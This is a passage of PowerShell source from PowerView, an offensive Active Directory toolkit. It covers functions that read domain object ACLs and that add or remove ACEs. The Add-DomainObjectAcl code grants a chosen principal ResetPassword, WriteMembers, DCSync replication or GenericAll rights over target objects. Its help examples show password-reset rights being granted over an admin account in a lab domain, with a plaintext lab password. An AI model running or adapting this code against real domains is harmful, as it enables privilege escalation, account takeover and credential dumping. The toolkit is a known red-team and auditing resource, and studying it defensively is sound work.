($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n        $Searcher = Get-DomainSearcher @SearcherArguments\n\n        $DomainGUIDMapArguments = @{}\n        if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server }\n        if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $DomainGUIDMapArguments['SSL'] = $SSL }\n\n        # get a GUID -> name mapping\n        if ($PSBoundParameters['ResolveGUIDs']) {\n            $GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments\n        }\n    }\n\n    PROCESS {\n        if ($Searcher) {\n            $IdentityFilter = ''\n            $Filter = ''\n            $Identity | Where-Object {$_} | ForEach-Object {\n                $IdentityInstance = $_.Replace('(', '\\28').Replace(')', '\\29')\n                if ($IdentityInstance -match '^S-1-.*') {\n                    $IdentityFilter += \"(objectsid=$IdentityInstance)\"\n                }\n                elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') {\n                    $IdentityFilter += \"(distinguishedname=$IdentityInstance)\"\n                    if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {\n                        # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname\n                        #   and rebuild the domain searcher\n                        $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'\n                        Write-Verbose \"[Get-DomainObjectAcl] Extracted domain '$IdentityDomain' from '$IdentityInstance'\"\n                        $SearcherArguments['Domain'] = $IdentityDomain\n                        $Searcher = Get-DomainSearcher @SearcherArguments\n                        if (-not $Searcher) {\n                            Write-Warning \"[Get-DomainObjectAcl] Unable to retrieve domain searcher for '$IdentityDomain'\"\n                        }\n                    }\n                }\n                elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {\n                    $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\\' + $_.ToString('X2') }) -join ''\n                    $IdentityFilter += \"(objectguid=$GuidByteString)\"\n                }\n                elseif ($IdentityInstance.Contains('.')) {\n                    $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))\"\n                }\n                else {\n                    $IdentityFilter += \"(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))\"\n                }\n            }\n            if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {\n                $Filter += \"(|$IdentityFilter)\"\n            }\n\n            if ($PSBoundParameters['LDAPFilter']) {\n                Write-Verbose \"[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter\"\n                $Filter += \"$LDAPFilter\"\n            }\n\n            if ($Filter) {\n                $Filter = \"(&$Filter)\"\n            }\n            Write-Verbose \"[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Filter)\"\n\n            #$Results = $Searcher.FindAll()\n            if ($Filter -and $Filter -ne '') {\n                $SearcherArguments['LDAPFilter'] = \"$Filter\"\n            }\n            $Results = Invoke-LDAPQuery @SearcherArguments\n            $Results | Where-Object {$_} | ForEach-Object {\n                if (Get-Member -InputObject $_ -name \"Attributes\" -Membertype Properties) {\n                    $Object = @{}\n                    foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                        if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or ($a -eq 'ntsecuritydescriptor')) {\n                            $Object[$a] = $_.Attributes[$a]\n                        }\n                        else {\n                            $Values = @()\n                            foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                                $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                            }\n                            $Object[$a] = $Values\n                        }\n                    }\n                }\n                else {\n                    $Object = $_.Properties\n                }\n\n\n                if ($Object.objectsid -and $Object.objectsid[0]) {\n                    $ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value\n                }\n                else {\n                    $ObjectSid = $Null\n                }\n\n                try {\n                    $SecurityDescriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0\n                    if ($PSBoundParameters['Owner']) {\n                        $SecurityDescriptor.Owner.Value\n                    }\n                    else { \n                        $SecurityDescriptor | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object {\n                            $Continue = $False\n                            $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]\n                            $_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid\n                            $_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask))\n                            if ($PSBoundParameters['RightsFilter']) {\n                                $GuidFilter = Switch ($RightsFilter) {\n                                    'ResetPassword' { @('00299570-246d-11d0-a768-00aa006e0529') }\n                                    'WriteMembers' { @('bf9679c0-0de6-11d0-a285-00aa003049e2') }\n                                    'DCSync' { @('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', 'GenericAll', 'ExtendedRight') }\n                                    'AllExtended' { 'ExtendedRight' }\n                                    'ReadLAPS' { @('ExtendedRight', 'GenericAll', 'WriteDacl') }\n                                    'All' { 'GenericAll' }\n                                    Default { '00000000-0000-0000-0000-000000000000' }\n                                }\n                                if ($_.AceQualifier -eq 'AccessAllowed' -and (($_.ObjectAceType -and $GuidFilter -contains $_.ObjectAceType) -or ($_.InheritedObjectAceType -and $GuidFilter -contains $_.InheritedObjectAceType))) {\n                                    $Continue = $True\n                                }\n                                elseif ($_.AceQualifier -eq 'AccessAllowed' -and !($_.ObjectAceType) -and !($_.InheritedObjectAceType) -and (($_.ActiveDirectoryRights -match $GuidFilter) -or ($GuidFilter -contains $_.ActiveDirectoryRights))) {\n                                    $Continue = $True\n                                }\n                                elseif (($_.AceQualifier -eq 'AccessAllowed') -and !($_.ObjectAceType) -and !($_.InheritedObjectAceType)) {\n                                    ForEach ($Guid in $GuidFilter) {\n                                        if ($_.ActiveDirectoryRights -match $Guid) {\n                                            $Continue = $True\n                                        }\n                                    }\n                                }\n                            }\n                            else {\n                                $Continue = $True\n                            }\n                            if ($Continue) {\n                                if ($GUIDs) {\n                                    # if we're resolving GUIDs, map them them to the resolved hash table\n                                    $AclProperties = @{}\n                                    $_.psobject.properties | ForEach-Object {\n                                        if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') {\n                                            try {\n                                                $AclProperties[$_.Name] = $GUIDs[$_.Value.toString()]\n                                            }\n                                            catch {\n                                                $AclProperties[$_.Name] = $_.Value\n                                            }\n                                        }\n                                        else {\n                                            $AclProperties[$_.Name] = $_.Value\n                                        }\n                                    }\n                                    $OutObject = New-Object -TypeName PSObject -Property $AclProperties\n                                    $OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL')\n                                    $OutObject\n                                }\n                                else {\n                                    $_.PSObject.TypeNames.Insert(0, 'PowerView.ACL')\n                                    $_\n                                }\n                            }\n                        }\n                    }\n                }\n                catch {\n                    Write-Verbose \"[Get-DomainObjectAcl] Error: $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Add-DomainObjectAcl {\n<#\n.SYNOPSIS\n\nAdds an ACL for a specific active directory object.\n\nAdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject  \n\n.DESCRIPTION\n\nThis function modifies the ACL/ACE entries for a given Active Directory\ntarget object specified by -TargetIdentity. Available -Rights are\n'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended\nrights GUID can be set with -RightsGUID. These rights are granted on the target\nobject for the specified -PrincipalIdentity.\n\n.PARAMETER TargetIdentity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nfor the domain object to modify ACLs for. Required. Wildcards accepted.\n\n.PARAMETER TargetDomain\n\nSpecifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.\n\n.PARAMETER TargetLDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory object targets.\n\n.PARAMETER TargetSearchBase\n\nThe LDAP source to search through for targets, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER PrincipalIdentity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nfor the domain principal to add for the ACL. Required. Wildcards accepted.\n\n.PARAMETER PrincipalDomain\n\nSpecifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Rights\n\nRights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.\nDefaults to 'All'.\n\n.PARAMETER RightsGUID\n\nManual GUID representing the right to add to the target.\n\n.EXAMPLE\n\n$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid\nGet-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}\n\n...\n\nAdd-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))\nVERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local\nVERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local\n\nGet-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }\n\nAceQualifier           : AccessAllowed\nObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : User-Force-Change-Password\nObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\n.EXAMPLE\n\n$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid\nGet-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}\n\n[no results returned]\n\n$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nAdd-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose\nVERBOSE: [Get-Domain] Using alternate credentials for Get-Domain\nVERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))\nVERBOSE: [Get-Domain] Using alternate credentials for Get-Domain\nVERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))\nVERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local\nVERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local\n\nGet-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }\n\nAceQualifier           : AccessAllowed\nObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : User-Force-Change-Password\nObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\n.LINK\n\nhttps://adsecurity.org/?p=1906\nhttps://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $TargetIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $TargetDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $TargetLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $TargetSearchBase,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $PrincipalIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $PrincipalDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync', 'AllExtended', 'GenericWrite')]\n        [String]\n        $Rights = 'All',\n\n        [Guid]\n        $RightsGUID\n    )\n\n    BEGIN {\n        $TargetSearcherArguments = @{\n            'Properties' = 'distinguishedname'\n            'Raw' = $True\n        }\n        if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain }\n        if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter }\n        if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase }\n        if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential }\n\n        $PrincipalSearcherArguments = @{\n            'Identity' = $PrincipalIdentity\n            'Properties' = 'distinguishedname,objectsid'\n        }\n        if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }\n        if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }\n        $Principals = Get-DomainObject @PrincipalSearcherArguments\n        if (-not $Principals) {\n            throw \"Unable to resolve principal: $PrincipalIdentity\"\n        }\n    }\n\n    PROCESS {\n        $TargetSearcherArguments['Identity'] = $TargetIdentity\n        $Targets = Get-DomainObject @TargetSearcherArguments\n\n        ForEach ($TargetObject in $Targets) {\n\n            $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] 'None'\n            $ControlType = [System.Security.AccessControl.AccessControlType] 'Allow'\n            $ACEs = @()\n\n            if ($RightsGUID) {\n                $GUIDs = @($RightsGUID)\n            }\n            else {\n                $GUIDs = Switch ($Rights) {\n                    # ResetPassword doesn't need to know the user's current password\n                    'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }\n                    # allows for the modification of group membership\n                    'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }\n                    # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2\n                    # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2\n                    # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c\n                    #   when applied to a domain's ACL, allows for the use of DCSync\n                    'DCSync' { '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'}\n                    'AllExtended' { 'ExtendedRight' }\n                    'GenericWrite' { 'GenericWrite' }\n                }\n            }\n\n            ForEach ($PrincipalObject in $Principals) {\n                Write-Verbose \"[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname)\"\n\n                try {\n                    $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$PrincipalObject.objectsid)\n\n                    if ($GUIDs -and !($GUIDs -eq 'ExtendedRight') -and !($GUIDs -eq 'GenericWrite')) {\n                        ForEach ($GUID in $GUIDs) {\n                            $NewGUID = New-Object Guid $GUID\n                            $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'\n                            $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $NewGUID, $InheritanceType\n                        }\n                    }\n                    elseif ($GUIDs -eq 'ExtendedRight') {\n                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight'\n                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType\n                    }\n                    elseif ($GUIDs -eq 'GenericWrite') {\n                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericWrite'\n                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType\n                    }\n                    else {\n                        # deault to GenericAll rights\n                        $ADRights = [System.DirectoryServices.ActiveDirectoryRights] 'GenericAll'\n                        $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity, $ADRights, $ControlType, $InheritanceType\n                    }\n\n                    # add all the new ACEs to the specified object directory entry\n                    ForEach ($ACE in $ACEs) {\n                        Write-Verbose \"[Add-DomainObjectAcl] Granting principal $($PrincipalObject.distinguishedname) rights GUID '$($ACE.ObjectType)' on $($TargetObject.Properties.distinguishedname)\"\n                        $TargetEntry = $TargetObject.GetDirectoryEntry()\n                        $TargetEntry.PsBase.Options.SecurityMasks = 'Dacl'\n                        $TargetEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)\n                        $TargetEntry.PsBase.CommitChanges()\n                    }\n                }\n                catch {\n                    Write-Verbose \"[Add-DomainObjectAcl] Error granting principal $($PrincipalObject.distinguishedname) '$Rights' on $($TargetObject.Properties.distinguishedname) : $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Remove-DomainObjectAcl {\n<#\n.SYNOPSIS\n\nRemoves an ACL from a specific active directory object.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject  \n\n.DESCRIPTION\n\nThis function modifies the ACL/ACE entries for a given Active Directory\ntarget object specified by -TargetIdentity. Available -Rights are\n'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended\nrights GUID can be set with -RightsGUID. These rights are removed from the target\nobject for the specified -PrincipalIdentity.\n\n.PARAMETER TargetIdentity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nfor the domain object to modify ACLs for. Required. Wildcards accepted.\n\n.PARAMETER TargetDomain\n\nSpecifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.\n\n.PARAMETER TargetLDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory object targets.\n\n.PARAMETER TargetSearchBase\n\nThe LDAP source to search through for targets, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER PrincipalIdentity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nfor the domain principal to add for the ACL. Required. Wildcards accepted.\n\n.PARAMETER PrincipalDomain\n\nSpecifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Rights\n\nRights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.\nDefaults to 'All'.\n\n.PARAMETER RightsGUID\n\nManual GUID representing the right to add to the target.\n\n.EXAMPLE\n\n$UserSID = Get-DomainUser user | Select-Object -ExpandProperty objectsid\nGet-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID}\n\n[no results returned]\n\nAdd-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword\n\nGet-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID }\n\nAceQualifier           : AccessAllowed\nObjectDN               : CN=user2,CN=Users,DC=testlab,DC=local\nActiveDirectoryRights  : ExtendedRight\nObjectAceType          : User-Force-Change-Password\nObjectSID              : S-1-5-21-883232822-274137685-4173207997-2105\nInheritanceFlags       : None\nBinaryLength           : 56\nAceType                : AccessAllowedObject\nObjectAceFlags         : ObjectAceTypePresent\nIsCallback             : False\nPropagationFlags       : None\nSecurityIdentifier     : S-1-5-21-883232822-274137685-4173207997-2104\nAccessMask             : 256\nAuditFlags             : None\nIsInherited            : False\nAceFlags               : None\nInheritedObjectAceType : All\nOpaqueLength           : 0\n\n\nRemove-DomainObjectAcl -TargetIdentity user2 -PrincipalIdentity user -Rights ResetPassword\n\nGet-DomainObjectACL user2 -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $UserSID}\n\n[no results returned]\n\n.LINK\n\nhttps://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $TargetIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $TargetDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $TargetLDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $TargetSearchBase,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $PrincipalIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $PrincipalDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync')]\n        [String]\n        $Rights = 'All',\n\n        [Guid]\n        $RightsGUID\n    )\n\n    BEGIN {\n        $TargetSearcherArguments = @{\n            'Properties' = 'distinguishedname'\n            'Raw' = $True\n        }\n        if ($PSBoundParameters['TargetDomain']) { $TargetSearcherArguments['Domain'] = $TargetDomain }\n        if ($PSBoundParameters['TargetLDAPFilter']) { $TargetSearcherArguments['LDAPFilter'] = $TargetLDAPFilter }\n        if ($PSBoundParameters['TargetSearchBase']) { $TargetSearcherArguments['SearchBase'] = $TargetSearchBase }\n        if ($PSBoundParameters['Server']) { $TargetSearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $TargetSearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $TargetSearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $TargetSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $TargetSearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $TargetSearcherArguments['Credential'] = $Credential }\n\n        $PrincipalSearcherArguments = @{\n            'Identity' = $PrincipalIdentity\n            'Properties' = 'distinguishedname,objectsid'\n        }\n        if 